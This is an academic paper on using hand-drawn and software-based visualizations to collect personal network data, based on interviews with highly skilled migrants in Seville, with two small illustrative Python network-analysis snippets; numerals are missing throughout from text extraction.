name boxes | specific name boxes are provided for respondents to list their alters. | enables respondents to list alters in a specific order. grouping names into group categories is natural and intuitive for respondents.

using visualization software to collect personal network data
a variety of software packages has been developed to collect data on personal networks. on the one hand, there are programs designed as an extension of the paper name generator, through which a list of alters can be elicited from the interviewees (e.g. egonet); and, on the other hand, programs that collect data through a visual interface (such as egoweb, vennmaker and openeddi). programs with a visual interface provide an interactive tool, which gives a fun element to the data collection phase and lowers the respondent burden typically associated with the collection of personal network data. however, they pose other issues that researchers need to consider in order to collect data efficiently. first, participants need to be technology conversant. second, the researcher needs to play a more active role in the data gathering: unmotivated respondents might leave out some of the ties between alters, given they are not asked to evaluate each alter pair tie as in a typical adjacency matrix (mccarty and govindaramanujam, ).
third, the data acquired is limited to a given template of the program used, while in free-hand drawings respondents are free to draw additional information. finally, interviewers need to consider whether to use a computer, laptop, tablet or mobile, as well as to take into account that in some areas, there is still limited access to internet connec- tion (eddens et al., ). a visual interface facilitates the depiction of com- plex structures, making them easily comprehensi- ble, helping both the respondent and the interviewer (gamper et al., ). its structured layout provides an integrated view of relations that would be hard to per- ceive just through narratives (in qualitative analysis) or tables (in quantitative analysis) (ryan and d’angelo, ). in the same vein, it provides a perspective, es- pecially in the context of interpersonal research, which cannot be gained otherwise (mccarty et al., ). moreover, visualizations are created in real-time, al- lowing participants to see their network, edit it and comment on it. different coding techniques yield a vast amount of data summarized within one image, also enabling interviewees to identify errors in their network. simply changing the shape of the nodes, for instance, using triangles for men and circles for women may allow respondents to detect information in their network, which they were not consciously aware about. finally, as any digital tool it permits easy storage, modification, reusability (gamper et al., ) and comparison with other networks. comparison of drawings and computer-based visualizations different studies have compared paper and computer- based visualizations. christopher mccarty et al. ( ) found that computer-based network visual- izations rendered important details that were differ- ent from respondents’ perceptions of what they had originally drawn, for example, allowing respondents to compartmentalize alters of different ethnicities. in a similar comparison used to investigate which tech- nique was most useful in identifying cliques, groups and communities, freehand visualizations were found to be simplistic in comparison to computer-based maps, but the paper-based method allowed respond- ents to be more creative in differentiating between different relations present in their network (cachia and maya jariego, ). similarly, hogan et al. ( ) found that the paper-based method was more visually compelling and allowed the respondents to see the network at once and to arrange the ties vis- ually easily using post-it notes. the most adequate method will depend on the objective of the study and the target population. for example, a highly skilled person is less likely to demonstrate reluctance to use an automated visual interface than someone who hardly knows how to use a computer, for whom the computer could already be creating a barrier that could negatively influence the interview. sometimes, the profession of the respond- ents also plays an important role as found by reyes ( ) in her study, whereby creative professionals showed a higher preference for free-hand drawing, as opposed to the use of an already pre-constructed design, such as concentric circles. consequently, the generation of data through vis- ualizations remains an area of research where more studies are needed to better understand how differ- ent approaches to data visualizations could lead to less bias in the data collected. 
as we have shown along this introduction, there is no one single meth- od of generating empirical data through visualiza- tions that does not yield its challenges, in terms of reliability, ease of use and time allocated for the data collection. network visualization is not a neutral tool, because like other instruments, it has its own bias and influence in how a personal network is visualized (ryan et al., ). moreover, the interviewer may also influence how a map is depicted (samuelsson et al., ), given an interview is also a dialog between the interviewer and interviewee. a major advantage of the visualization method remains participant satisfaction and removing burden from the respondents that in it- self could lead to potential problems with validity and reliability, especially when networks are too big and respondents purposely obliterate data, due to tired- ness and boredom (eddens and fagan, ). this study in this paper, we explore four contributions related to the use of network visualization in the context of data collection, based on our study on a group of high- ly skilled migrants living in spain (n = ). first, we explore a procedure in which network visualizations are integrated with traditional name generators. sec- ond, we examine the network visualization as a tool for qualitative interpretation for the participant dur- ing data collection. third, we compare how sponta- neous, hand-drawn sociograms differ to analytical visualizations elicited through visualization software packages. finally, we analyze different strategies on how respondents can use network visualizations to what the eye does not see: visualizations strategies for the data collection of personal network identify communities in networks. for each section, we draw on our research to explore and discuss the methodological opportunities and challenges in using network visualizations during the data collection and their potential use in the future. participants this research is based on data from foreigners re- siding in seville for a study that aimed at understand- ing how the type of mobility could influence the com- position and structure of personal networks (cachia and maya jariego, ). respondents belonged to four different foreign communities in seville: erasmus students (n = ); partners of a research institute, as part of the joint research centre of the european commission (n = ); japanese flamenco artists (n = ); and musicians from the royal symphonic or- chestra of seville (n = ). a high proportion of the respondents were female ( %) and the age of the respondents varied, with a majority belonging to the – age group ( %). the majority of respondents possessed post-graduate degrees ( %) or a degree ( %), for which we classified this population as high- ly skilled migrants, a population which has been less studied in the context of migration (ryan et al., ). interviews were conducted in english and lasted be- tween and minutes. methods and procedure data of this study was collected in two steps, using e-mail and face-to-face interviews. the first step of data collection consisted in a multiple name generator collected through a document sent by e-mail. in our study, participants were contacted prior to being sent the name generator and in most cases their names had been referred by friends through a snowball sam- pling. this helped in establishing a higher response rate. 
we ensured that participants were given clear instructions on how to complete the multiple name generator, with very precise instructions on how to fill in the list of alters and an example to refer to should one get confused. prior to starting the interviews, the instructions were tested with five people of different nationalities for whom english was not the first language, and changes were made accordingly. upon receipt of the name generator document, the researcher would set up the interview. on average, data collection from the two modes was separated by a week. in the second phase, participants were invited to attend an interview, during which three network visualizations were completed. first, participants produced a freehand drawing of their network. second, using vennmaker (schönhuth et al., ), respondents represented the structure and composition of their personal networks. finally, using the same software, in a third visualization they were asked to elicit alters' attributes. vennmaker allows researchers to develop the personal networks with the respondents through visualization and to produce network data based on the visualization. it calculates basic network metrics, and the network map can be exported as a matrix that can be imported in other programs, such as ucinet or visone. for this study, in the evaluation of the personal network, a fixed number of alters was selected. this network size incorporates the major sources of social support according to previous research, which has shown that the alters strongly connected with ego tend to be few, varying between – (wellman, ), with the innermost layer of a network, known as the support clique, averaging five members, and the next layer, known as the sympathy group, oscillating between – members (dunbar and spoors, ; milardo, ; roberts et al., ). second, this is a network large enough for structural network analysis, based on previous findings (mccarty, ; maya-jariego, ). on the other hand, this is a network size that is feasible in time during the data collection, given we wanted to administer name interpreters for each alter. finally, the limit was established to produce a legible representation, reducing the cognitive load and the concentration required to remember all the visual cues and instructions. previous research has shown that when the number of alters is high, it becomes a challenge to visualize (ryan et al., ). these decisions were based on reaching an equilibrium between data collection efficiency through the gathering of data in the least time possible (bidart and charbonneau, ), and data reliability, both in terms of composition and structure (mccarty, ). the names were elicited through a multiple name generator consisting of eight questions based on previous social support studies (barrera, ; burt, ; fischer, ; marin and hampton, ; van der poel, ; wellman, ; wellman and wortley, ). the eight questions corresponded to emotional support, instrumental support, social companionship, co-presence and other types of support. given our interest in mobility, a specific name generator was added to identify which alters prompt travel by our respondents. the use of several name generators ensured that the research gathered data about a multidimensional definition of support, hence obtaining a more accurate representation of the total social support network (marin and hampton, ; van der poel, ).
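a sketch of how the answers to several generator questions can be merged into a single alter list is shown below; the prompts, names and the cap of 30 alters are hypothetical stand-ins, not the actual questions or fixed size used in the study. the point is simply that duplicates across questions are collapsed while the order of first mention is preserved, before the list is trimmed for the structural evaluation.

```python
# Hypothetical sketch: merging names elicited by multiple generator questions
# into one de-duplicated alter list, trimmed to a fixed evaluation size.
FIXED_SIZE = 30                                    # hypothetical cap

answers = {                                        # hypothetical prompts and names
    "emotional support":     ["ana", "luis", "marta"],
    "instrumental support":  ["luis", "ken"],
    "social companionship":  ["marta", "paula", "ana"],
    "travel-prompting ties": ["ken", "ines"],
}

alters, seen = [], set()
for question, names in answers.items():
    for name in names:
        if name not in seen:                       # keep first-mention order, drop repeats
            seen.add(name)
            alters.append(name)

alters = alters[:FIXED_SIZE]
print(alters)    # ['ana', 'luis', 'marta', 'ken', 'paula', 'ines']
```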
a single-name generator may be much faster, but it might result in forgetting individuals who are significant but not easily remembered (bidart and charbonneau, ). as demonstrated by marin ( ), using different name generators may also be a way of avoiding association bias, whereby individuals only name persons who belong to the same group or take part in a similar activity.

using visualizations in empirical network data collection
integrating visualization with traditional name generators
the graphical representation of relationships can be used effectively in the collection of empirical network data. in this section, we examine two different ways in which this can be carried out. on the one hand, visualization is a device that can be used to generate names and relationships, either by itself or in combination with traditional name generators. on the other hand, once we have a finished network, the visualization enables the informant to interpret the personal network and give meaning to the resulting structure.

generating names and relations through visualizations
the traditional procedure to obtain a personal network usually consists of a name generator that provides a list of names and a matrix of actors, completed by the respondents. alternatively, it has been comparatively much less frequent to use visualization to obtain information about personal networks. in this case, the nodes and relationships are represented progressively, as the data is collected, which reinforces the process of collecting information. there are some computer programs, such as vennmaker or visone, that make it possible for researchers to start with a graphical input to develop a personal network, without the need to start from a previous adjacency matrix. accordingly, these programs may be incorporated directly in an interview, or in a survey, that is, in the process of data collection. in general, the graphic interface is attractive to the informant and helps respondents remember information. moreover, it reduces fatigue and can be quite efficient. on the other hand, it is relatively more difficult to follow the same systematic and exhaustive collection of information that is typical of traditional name generators, in which the relationship between each pair of actors is examined separately. therefore, it is important that the researcher is aware that some information may be lost, or that the usual analytical protocol is not completed. in our study with four immigrant groups in seville, respondents were provided with a variety of coding tools, given to them sequentially at different stages, so as to avoid confusion. the list of alters, which the respondents had listed in the name generator, was inputted by the researcher in vennmaker and hence, during the interview, the respondents already had their list of alters displayed on the left-hand side of the program (see figure , left). ego was removed from the map, to avoid redundant information, given ego is connected to all alters. respondents were instructed to move alters freely from the column on the left of the map space and to place them wherever they liked on the map space. once all alters were in the map space, a systematic information collection procedure was followed, dyad after dyad, which was not considered finalized until questions about all the potential relations between alters had been asked.
in our case, a relation was established if alters knew each other and would sa- lute each other in the absence of ego, as shown in figure . respondents were instructed to use a line between alters to indicate a relation between alters. during pretesting, we found that dividing the screen in four with a cross and suggesting respondents to start with relations of alters in the left bottom square and go clockwise, enabled participants not to get confused and forget any alter in the process. while this suggestion was voluntary, all the participants opt- ed to establish the relations using this order. through this visualization, we obtained the adjacency matrix of our respondents, given the program we used provide the possibility to export the data of the visualization into an adjacency matrix. in our study, we have observed that when using a software package for data collection, the pres- ence of the researcher is a way of assuring that the data collected is complete, avoiding problems relat- ed to structure and composition due to incomplete networks as suggested by mccarty and govindara- manujam ( ). during the data collection it is not uncommon for some participants to feel exposed sometimes even embarrassed or simply get tired, hence, it is important that the researcher steps in and helps with the network visualization. we have noticed that participants, especially those were less technolo- gy conversant, got tired quicker and were happy that the research could help with the visualization. during the network drawing on vennmaker, participants in- stinctively moved some alters around, in order, to be able to see the network better. vennmaker allows the what the eye does not see: visualizations strategies for the data collection of personal network movement of alters, without altering the relations with alters. this was interesting because it demonstrated how participants looked for solutions and were not taken aback by seeing their visualization on a laptop opposed to findings in previous research (hogan et al., ). giving meaning to visualizations of personal networks when a graphic representation of the personal net- work is shown to the participant, a conversation about the properties of the visualization naturally aris- es. spontaneously, participants are interested, some- times expressing surprise reactions to what they see. generally, it is easy to elicit interpretations that try to explain the resulting graph. the interviewees provide a context to understand the overall structure, the ex- isting groupings or the position of some individuals (alters). often, they resort to their biographical trajec- tory to give meaning to the composition or structural properties of the personal network. as shown in a previous study (maya jariego and holgado, ), on average informants tend to di- vide their personal network into four groups which often correspond to the family, a group of friends, co-workers (or student friends) and a fourth context of alternative interaction, for instance, friends from a swimming club. they also tend to highlight around three key actors – who may be a partner, parents or a close friend – usually characterized by their significant connection to several of the groups identified in the personal network. when describing the visualization, attention is nor- mally focused on the central space and then moved to the periphery. 
the interpretation focuses on those individuals who seem to have a more prominent role in terms of centrality, or who connect several subsets in the network. in addition, respondents frequently re- sort to the identification of social groups, organizing their interpersonal space according to the usual inter- action contexts. we have summarized the qualitative description strategies of personal networks in table . visualizations provide the possibility to code the data in a way that is easy for both the participant and the researcher to understand the data. as can be observed in figure (right), which corresponds to an orchestra musician, a great deal of information can be depicted in one visualization. in this graph, we have used the color of the nodes to indicate the nationality of the nodes, the size of the nodes to indicate the duration of the tie and the map space to depict the location of alters mentioned. the graph suggests a respondent who is well settled in seville, with a great proportion of important ties being spanish, who also reside in seville. the size of the nodes indicate that the respondent has possibly lived for a long time in seville, given the respondent has known a high pro- portion of the local alters for more than years. as typical in most immigrant networks, in the country figure : two visualizations presented to respondents. left: basic network diagram before geographical classification of alters. this graphic was elaborated during the interview, in interaction with the interviewee. right: personal network of a musician of the royal symphony orchestra of seville. colors represent nationalities of alters: red, spanish nationality; blue, same nationality as the respondent; green, other nationalities. three areas distinguish the location of residence of alters: seville (spain), home country, other locations. the size of the node represents the duration of the tie, the bigger the node the longer the respondent knew alter. connections of origin, alters are of the same nationality of the respondent. the nodes in the third location typically indicate previous movement of the ego, however, in this case, given alters are spanish and of the same nationality of the ego, their position may suggest that it is alters who have moved to another location. the interview with the respondent was an opportunity to check that all this information was correct, as well as confirming the hypothesis that researchers derived from its interpretation. in our study, the first graphical representation of the network provided a good base for discussion. in general, respondents were pleasantly surprised to see their network and often, commented spontane- ously without any prompting on the structure of their network. primarily, respondents often discussed the groupings of their network; as well as, identifying the groups and what type of relation they represented, as for instance, these are my friends from primary school, or these are family members who have moved to another country. typically, respondents also dis- cussed alters who are central in their network in terms of connections, which instinctively were often de- picted in the center of the network space, as can be seen in figure (left). at the same time, most of the respondents would describe isolates in the network, such as node in figure (left). we sensed that typ- ically respondents wanted to give an explanation why these nodes were so isolated in their network. 
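the kind of coding just described for the musician's sociogram (nationality as node colour, tie duration as node size) can be reproduced with standard tools. the sketch below uses hypothetical alters and attribute values, and networkx with matplotlib is an assumption for illustration rather than the software used in the study.

```python
# Hypothetical sketch: colour nodes by nationality and size them by how long
# ego has known each alter, mirroring the coding described above.
import networkx as nx
import matplotlib.pyplot as plt

g = nx.Graph([("ana", "luis"), ("luis", "marta"), ("marta", "ana"), ("ken", "yuki")])
nationality = {"ana": "spanish", "luis": "spanish", "marta": "spanish",
               "ken": "other", "yuki": "same as ego"}
years_known = {"ana": 14, "luis": 9, "marta": 11, "ken": 2, "yuki": 6}

palette = {"spanish": "red", "same as ego": "blue", "other": "green"}
colors = [palette[nationality[n]] for n in g.nodes()]
sizes = [150 + 60 * years_known[n] for n in g.nodes()]    # bigger node = longer tie

nx.draw_networkx(g, node_color=colors, node_size=sizes)
plt.axis("off")
plt.show()
```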
we also used a second map, which facilitated information on the geographical distribution of the respondents’ contacts. in this case, the relations covered a transnational space, between the coun- try of origin and the receiving country (and some- times even with a third geographical space, when the individual has previous itinerant trajectory). it is usual that the “there” and the “here” appear in the qualitative description of the graphic representation. this configuration introduces a greater fragmentation in personal networks (maya-jariego and armitage, ), very evident for example in the case of eras- mus students, with a short stay at destination. it also entails that the informants explain the changes that their personal network has experienced from a func- tional point of view. for example, it is typical that a group of strong ties are in the country of origin, while the rest (with whom now there are no opportunities for daily interaction) have passed into a latent state. on the other hand, the greater relative presence of weak ties in the new space of sociability (in this case, seville) may depend on the length of stay and the type of mobility undertaken by the individual (cachia and maya jariego, ). previous mobility will also result into a more fragmented personal network, given al- ters may be more dispersed than if the respondents have only lived in one foreign location. respondents with more dispersed networks, very frequent among the itinerant workers of the european commission, were surprised that a good proportion of their social support network were living in other locations and immediately, tried to explain why their network was so fragmented. this visualization prompted discus- sion on how respondents receive social support from distance alters, whereby respondents discussed how they connected with these alters through media com- munications or periodic visits and how living in differ- ent location has led to a higher dispersion of alters. as we have already indicated, the visualization of the data following a core-periphery scheme is intuitive for the informants. the interpretation is usually guid- ed by the layout of subsets that corresponds to the most significant social contexts in which the individu- al participates. in addition, special attention is paid to alters that are more significant from a personal point table . qualitative description of personal networks. strategies description implications concentric circles comments are organized in segments of relative importance, from the inside out center-periphery logic relative importance of individuals the role of alters with greater centrality and intermediation stands out strong ties brokers groups subsets of alternatively densely connected are identified social circles contexts of interaction communities of belonging isolates an explanation is often given to explain why certain nodes are isolated accessibility to alternative social circles what the eye does not see: visualizations strategies for the data collection of personal network of view, either because you have a more intense re- lationship with them, spend more time with them, or are providers of multiple types of social support. what is in a graph? 
contributions of a systematic and analytical approach one conclusion that we can derive from the previous analysis is that the way the data are presented vis- ually is not inconsequential, since it can potentially affect the perception of the respondents or the type of comments and interpretations prompted from the graph. next, we explore the value added by the an- alytical representation of networks when compared with other strategies individuals follow to spontane- ously describe their network. finally, this will allow us to highlight the value of network analysis visualization in identifying underlying structures that are not natu- rally evident to individuals. comparison of spontaneous hand-drawn visualizations with the analytical rep- resentation of the personal network to have an element of comparison, in our study we asked the participants to make a visual representation of their relationships. this request was left open, so as to allow spontaneous drawings and, thus, avoid- ing inducing a specific layout. for the same reason, the word “network” was intentionally omitted from the instructions. the result indicates to a certain extent how egos perceive their networks. the representations of the social relations of each individual obtained were highly varied. in table , we summarize the eight most frequent drawings. most respondents opted to represent their social relations through the use of groups with whom a frequent re- lationship is maintained. specifically, the classification into social groupings appears in almost two-thirds of the analyzed drawings (n = , . %). in some cas- es, the groups in which the individual participates are listed directly, while in others the subsets are drawn from the lists of names or nodes that have been pre- viously represented. the most frequent combinations are to identify groups from a list of names (n = , . %) or from the ego’s tree of relationships (n = , . %), sometimes in the form of a star network. al- though less common, there are some cases in which a graph with nodes and relationships is segmented into subgroups after its completion (n = , . %). two other common strategies were the elaboration of lists of names (n = , . %) or the drawing of a star network around ego (n = , . %). in both cases, the main strategy consists in reducing the interpersonal environment to the contacts available to the individual. however, the drawing of a relationship tree (or a star network) around the respondent usually entails, even if only partially, a close resemblance to the structure of relations around the respondent. for example, when drawing a star network around ego, some respond- ents place the most important relationships closer to ego, or point to indirect relationships that emerge from contacts in the first order zone of ego. only a small number of respondents drew (partial- ly) graphs (n = , . %), composed of a set of nodes and their relations to each other. such graphs are usually incomplete, because even though relations are drawn between alters, they are not done exhaustively. finally, concentric circles, as a way to organize the visualizations according to the relative importance of alters, hierarchical classification diagrams or group- ings depending on the geographical location of alters were also used. in figure , we have selected six examples of graphic representations, to illustrate the combination of the strategies above. the classification into groups, either by the stacking of nodes (i.e. 
names) or by the use of social categories, is combined with all kinds of visualizations. the most common is to classify al- ters according to the type of relationship (for exam- ple, family, friends and neighbors), or depending on the interaction contexts (for example, “the group with whom i cycle”). we have observed that for the partic- ipants in our study, it is far much easier to represent their personal network in terms of social categories, as opposed to an analytical visualization of relation- ships. also, the networks correspond to partial rep- resentations (such as a star network, node segments according to their relative importance or, at the sim- plest end, a list of names), rather than a complete graph, given the latter requires an exhaustive compi- lation of nodes and their relationships with each other. in this study, we found no evidence that the type of spontaneous visualization is related to the struc- tural properties of the personal network. however, in some cases we observed certain parallelism be- tween the respondent’s drawing on the blank page and the subsequent interactive representation with vennmaker. for example, an erasmus student of ger- man origin distributed his personal contacts between two differentiated socio-geographical spaces, rep- resenting the country of origin and the city of seville (as we can see in figure , left). this same scheme was repeated in the graph that was generated in vennmaker with the help of the interviewee (figure , center). possibly, the cognitive representation that an individual has of his personal network – although it connections is a global perception, without attention to detail – , conditions the way in which information is stored and recovered from memory. therefore, it can influence in some way the collection of relational data. it is precisely the collection of systematic and ex- haustive information that allows us to capture rela- tional patterns that are not intuitively perceived by the interviewees, generating novel structural information even for them. some participants resorted to artistic representa- tions. for example, an erasmus student drew a tree, whereby the central trunk containing the core alters sustains the branches that have emerged through her biographical itinerary (figure , left). in another case, a flamenco artist distinguishes between the closest strong relationships that she meets frequently and alters distributed in the different geographical locations in which she has resided (figure , right). in comparison with these graphs, the analytical visualization is not based on the symbolic value of the representation. however, what is lost in imagery is gained in structure: revealing the underlying struc- ture can have a similar effect, giving the observer a deep insight, the feeling of being able to observe and apprehend the whole picture. identifying groups and communities through personal networks in a previous study (cachia and maya jariego, ), which served as a pretest of the instruments we used in the present investigation, we verified that the visualization of personal networks facilitates the de- tection of social groups and communities in which respondents participates. specifically, we compared the spontaneous enumeration of significant groups table . common visualization strategies used in the spontaneous representation of the personal network. strategy n % description groups . the respondent draws a line or a circle in which he/she groups a subset of people belonging to the same category (e.g. 
“housemates,” “family,” “friends from work,” “flamenco colleagues,” etc.) list of names . the interpersonal environment is summarized through a list of contacts. names tend to be elicited through association and it is common that contacts with a similar relationship (e.g. siblings) have a close position to each other in the drawing ego’s star or ego’s tree . it consists of representing ego in the center of the graph and drawing around his direct contacts. links between alters are rare, if there are any. we have called “relationships tree” those cases in which, from the direct relationship with ego, other branches of indirect relationships emerge nodes and relationships . a graph is drawn, composed of a set of individual nodes and the relationships they maintain between them concentric circles . the most important relationships are drawn in the center of the graph and around them concentric circles of decreasing relative importance are shown successively artistic representation . in some cases, respondents opted for creative drawings to represent metaphorically the characteristics of the personal network geographical position . some respondents draw the distribution of their contacts according to the geographical location of alters. for instance, in our study, given it is based on a sample of people who have changed their place of residence, alters were placed between the home country and the host country diagram or organization chart . a schema is represented that organizes the personal contacts following some system of hierarchical classification, or imitating the structure of an organizational chart note: in each strategy, we indicate the number and percentage of respondents who used this form of graphic rep- resentation. the same respondent can use several visualization strategies in the same graph. what the eye does not see: visualizations strategies for the data collection of personal network and communities by the respondent with the iden- tification of groups and communities based on the visualization of their personal network. we found that the participants identified times more communities and . more groups from the analytical visualizations than from the spontaneous drawing. therefore, a more exhaustive evaluation of the per- sonal network not only reflects its structure in greater detail, but also allows researchers to capture uncon- scious structural properties, that is, those that the in- dividual would be unable to describe spontaneously and intuitively. returning to the study with the four im- migrant collectives in seville, it can be easier for the respondents to explain how their relations are distrib- uted in the transnational space by placing the nodes in the different areas that represent the place of habit- figure : six examples of hand-drawn visualization of personal networks. (a) the respondent has listed names in groups (family, neighbors, etc.). (b) the representation is a star network of ego, in which groups of names have been connected instead of individual nodes. (c) it is a symbolic representation, in which the individual has classified her contacts in three categories. (d) the sun represents the strongest and most significant ties for the respondent, whose light nourishes other relationships that have developed in holland (the tulips) and in spain (the daisy flowers). (e) the spiral allows the recognition of three segments of alters, depending on their proximity to ego, which correspond to three levels of relative importance. 
(f) a network of relationships between individual nodes is divided in ten different groups.
figure : spontaneous visualization and graphic representations with vennmaker and ucinet of the personal network of an erasmus student.
ual residence of the alters. however, the systematic, analytical and exhaustive collection of relationships not only reduces social desirability but also reveals novel processes for the informants themselves. indeed, the analytical visualization contributes to the understanding of social structures, notwithstanding that its application as a technique consumes a great deal of time and effort. in this study, we refrained from asking respondents to enumerate the groups and communities in their visualizations, and what we noted is that respondents intuitively tried to represent alters in different groups. interestingly, this was more visible in the hand-drawn visualizations. respondents used various techniques to group people together, varying from drawing people together in one space, to using squares and lists, to using circles, amongst others. a major advantage of using a blank paper for visualizations is that respondents are free to represent their networks as they like, without any restriction. in this respect, this type of visualization seems to correspond better to how respondents perceive their networks, and the structural features of the network are simplified. the richness of the structural data of the automated visualizations was a novel aspect of respondents' networks. many were pleasantly surprised to see their automated visualization, prompting them to comment on different aspects of the relations. for instance, they would comment that they were not aware that a particular group in their network was so closely-knit or that some alters hardly knew anyone in their network. there were instances where the detection of groups became clearly visible when the relations were added to the network (see figure ). if we look at the two visualizations, we observe how in the automated visualization (on the right), four groups clearly emerge from the visualization, something which was not easily detectable in the spontaneous drawing. moreover, the respondent could also observe how one of the groups is very densely connected, a characteristic which is not visible at all in the free-hand drawing.
figure : symbolic representations of the personal network.
figure : spontaneous drawing and the automated visualization by an erasmus student.
it was also interesting to observe that the transnational dimension was often depicted in a great variety of the networks. the transnational spaces can be easily identified in the way the network is drawn or constructed. in this respect, we have often observed similarities in terms of network structure between the way networks are drawn and the automated version. the major difference between the two types of visualizations lies in the relations. in the spontaneous drawing, respondents tend to simplify the connections, using various techniques.
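the analytical step that makes this kind of group structure explicit can be sketched as follows. the ties are hypothetical, and the modularity-based community detection from networkx is used here as one possible method, not as the procedure applied in the study; each detected group is then checked for how densely connected it is.

```python
# Hypothetical sketch: detect communities and report the density of each group,
# the kind of structural reading that a free-hand drawing does not make visible.
import networkx as nx
from networkx.algorithms.community import greedy_modularity_communities

g = nx.Graph([
    ("ana", "luis"), ("luis", "marta"), ("marta", "ana"),   # a densely connected cluster
    ("ana", "paula"),
    ("ken", "yuki"), ("yuki", "hiro"),                      # a second, looser group
])

for group in greedy_modularity_communities(g):
    sub = g.subgraph(group)
    print(sorted(group), "density =", round(nx.density(sub), 2))
```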
in this respect, in this study we have observed that while some structural features of the network are of- ten visible in the hand-drawn visualization, the global structure of the network remains concealed and only becomes visible through an automated visualization. in figure , we can note how the automated visual- ization (right) illustrates a highly dense group, which would have not been detected through the sponta- neous drawing. in contrast, the clear division of the groups is more visible in the hand-drawn visualiza- tions. the analytical representation helps to become aware of the general structural properties. discussion in this paper, we have shown two ways how to use network visualization in data collection. on the one hand, as a generator of names and relationships, the graphic representation acts as a facilitator that reduc- es the perceived load in the information collection process. on the other hand, as a device for request- ing qualitative interpretations, visualization allows ob- taining biographical information and the identification of natural interaction contexts. in both cases, it works efficiently in the description of transnational spaces and organizing relationships by socio-geographical areas. as found by ryan and d’angelo ( ) when using sociograms in their longitudinal research on mi- grants, visualizations prompted respondents to dis- cuss issues related to identity and their changing self through time, instead of simply checking how many ties have changed or remained. the advantages of using computer-based net- work visualization in the data collection are numer- ous. a depiction of complex structures is easily made comprehensible, helping both respondent and inter- viewer (gamper et al., ). through digital network visualizations it is much easier for the interviewee to identify errors in their network. these advantages are confirmed when compared to the spontaneous representations of the personal network (mccarty et al., ). computer-based network visualizations rendered important details that were different from respondents’ perceptions of what they had originally drawn, for example, allowing respondents to com- partmentalize alters of different ethnicities. however, visualization strategies have some limi- tations in the systematic collection of information of the dyad relations. while name generators with a ma- trix of alters force the interviewee to be disciplined in the evaluation of the dyads one by one, with graphic devices there is a tendency to focus on the overall vision of the relationships. we have seen this when comparing hand drawings of personal networks with the elaboration of traditional graphs. this is consist- ent with the value attributed to the technique of name generators when a valid and reliable measure of the size of an individual’s personal network is sought (hogan et al., ). figure : spontaneous drawing and the automated visualization by a partner of a worker of the european commission. connections in the spontaneous representation (through free- hand drawing), participants frequently resort to the identification of social groups (which sometimes reflect the main contexts of interaction in which the individu- al participates, or significant subsets of their personal network, for example in function of the type of rela- tionship). in our case study, referring to the transna- tional space, the groups are usually organized in two or more geographical areas. 
some drawings also rec- ognize partial approaches to a network, either with a list of names, with a graph in the form of a star around ego, or with nodes and relations drawn in a non-sys- tematic way. the preference for the use of group cate- gories had previously been observed with samples of university students and immigrants (maya jariego and holgado, ; mccarty et al., ). in the context of transnational mobility, becoming aware and under- standing the structure of the social support network may be highly significant and is clearly associated with psychological adaptation during relocation. in contrast, analytical visualizations generate a more detailed representation, which reveals structural patterns that are not intuitively evident to the partici- pants. that is, it serves to identify unconscious rela- tional phenomena, such as belonging to communities or participation in social circles. this highlights the beneficial use of network analysis in the study of the psychological sense of community, social cohesion and community integration processes (maya-jariego, ). in our study, it was interesting to verify that the groups with which the individual has a direct relation- ship (which are usually represented in the personal network), are an efficient means to detect the commu- nities of indirect relationships of which they are a part. resorting to visualization during data collection has great advantages in terms of reducing partici- pant burden and time. on the other hand, the ver- satile nature of visualizations provides an enormous potential to integrate it with the objectives of each specific investigation. it is a strategy that seems to coincide with the mechanisms of perception of the social world (brands and mehra, ; mehra et al., ): for participants it is natural to represent their relationships on a map or “read“ the graphic rep- resentation of their personal network. in addition, it allows them to concentrate on the fundamental properties of their interpersonal space, considering the entire configuration (which entails certain degree of simplification). in some cases, “gestalt” has been identified as a subjective approach followed by indi- viduals in the description of their networks (von der lippe and gamper, ). this shows that complet- ing a matrix in a traditional name generator requires a different type of cognitive processing from the visual representation of relationships during the interview process. the analytical approach is less intuitive and more expensive, both for the interviewer and for the interviewee. however, within this limitation lies its vir- tue, since the unconscious ways of obtaining ties and relationships not only reduce the social desirability of the information obtained but also may eventually gen- erate structures that are a surprise even for inform- ants. the analytical approach sometimes makes visi- ble what the eye does not see. conclusions in this paper we have reviewed different strategies of visual representation of the networks, together with the contributions and limitations that each of them en- tails. the visualization can be based on a spontaneous drawing, without restrictions; in a computer-assisted interactive interview, or in analytical data collection through a name generator and an adjacency matrix. each approach has its advantages and disadvantages. depending on the objective of the study, the researcher should choose what type of visualization to use, keep- ing in mind, that the type of visualization could mean obliterating some data. 
for instance, in this study we have shown that an automated visualization is a better tool if the researcher is interested in the global structur- al features of the network. on the other hand, a hand- drawn visualization would be more apt if the researcher is trying to understand how interviewees perceive their network, given the unstructured approach allows them to depict their network freely, without any template of automated visualizations. in fact, the combination of strategies can help to counteract some of the limita- tions and generate new types of data. through the study of the transnational relations of four groups of foreigners living in seville, we have verified the natural tendency to simplify the social world in social categories (referred to as groups of belonging), as well as the specific value of analytical displays, which allow to go beyond the cognitive ca- pacity of the individual on his space of relations: • the description of interpersonal space through social groups is an intuitive strategy, which the respondents use both when they draw their personal network spontaneously and when they are asked to give meaning to a socio- gram. the categories are a central element in the processes of social perception. • however, analytical graphs detect structural patterns that are not intuitively evident, facilitat- ing the description of social circles and com- munities of belonging. what the eye does not see: visualizations strategies for the data collection of personal network references agneessens, f., waege, h. and lievens, j. ( ). social support typologies: different approaches for reducing social support data. developments in social science methodology, : – . antonucci, t. ( ). hierarchical mapping technique: measuring social support networks. gener- ations, ( ): – . barrera, m. ( ). a method for the assessment of social support networks in community survey re- search. connections, ( ): – . bastian, m., heymann, s. and jacomy, m. ( ). gephi: an open source software for exploring and ma- nipulating networks. paper presented at the internation- al conference on web and social media, available at: https://gephi.org/publications/gephi-bastian-feb .pdf san jose, california, may – , . published by the aaai press, menlo park, california. bidart, c. and charbonneau, j. ( ). how to gen- erate personal networks: issues and tools for a socio- logical perspective. field methods, ( ): – . brands, r. a. and mehra, a. ( ). gender, bro- kerage, and performance: a construal approach. academy of management journal, ( ): – . burt, r. s. ( ). network items and the general social survey. social networks, ( ): – . cachia, r. and maya jariego, i. ( ). eliciting communities from personal network visualisations: ties, groups and communities . paper presented at in- ternational network for social network analysis: sun- belt xxx., trento. cachia, r. and maya-jariego, i. ( ). mobility types, transnational ties and personal networks in four highly skilled immigrant communities in seville (spain). social networks, : – . carrasco, j. a., hogan, b., wellman, b. and miller, e. j. ( ). collecting social network data to study so- cial activity-travel behaviour: an egocentric approach. paper presented at the th transportation research board meeting, washington, dc. cheong, l., armour, c. and bosnic-anticevich, s. ( ). primary health care teams and the patient per- spective: a social network analysis. research in social and administrative pharmacy, ( ): – . den besten, o. ( ). 
